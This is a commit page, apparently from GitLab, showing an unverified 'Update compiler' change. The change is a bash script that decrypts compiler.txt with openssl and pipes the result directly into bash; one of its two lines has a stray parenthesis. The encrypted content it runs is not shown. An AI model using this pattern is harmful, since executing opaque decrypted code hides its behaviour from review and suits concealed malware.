Unverified Commit d1e94a8c authored by Dapa's avatar Dapa Committed by GitHub

Update compiler

parent 3a294f47
#!/bin/bash
echo $(cat compiler.txt | openssl aes-256-cbc -a -salt -d) | bash
bash -c 'cat compiler.txt | openssl aes-256-cbc -a -salt -d)' | bash
Markdown is supported
0%
or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment